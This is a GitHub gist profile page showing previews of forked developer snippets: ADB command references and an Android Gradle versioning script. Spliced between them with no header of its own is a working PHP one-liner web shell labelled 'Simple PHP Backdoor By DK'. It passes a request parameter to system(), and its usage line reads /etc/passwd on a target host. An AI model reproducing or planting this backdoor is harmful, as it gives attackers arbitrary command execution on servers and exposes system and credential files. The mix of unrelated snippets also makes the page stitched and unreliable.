Skip to content

Instantly share code, notes, and snippets.

View yeho's full-sized avatar
💻
Mobile expert working

Yeho yeho

💻
Mobile expert working
  • BYTDEV
  • Monterrey
View GitHub Profile
@yeho
yeho / AdbCommands
Created December 8, 2022 21:13 — forked from Pulimet/AdbCommands
Adb useful commands list
adb help // List all comands
== Adb Server
adb kill-server
adb start-server
== Adb Reboot
adb reboot
adb reboot recovery
adb reboot-bootloader
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@yeho
yeho / build.gradle
Created December 4, 2020 18:08 — forked from maxirosson/build.gradle
Versioning Android apps + Feature Branches
apply plugin: 'com.android.application'
ext.versionMajor = 1
ext.versionMinor = 2
ext.versionPatch = 3
ext.versionClassifier = null
ext.isSnapshot = true
ext.minimumSdkVersion = 15
ext.featureBranchPrefix = "feature/"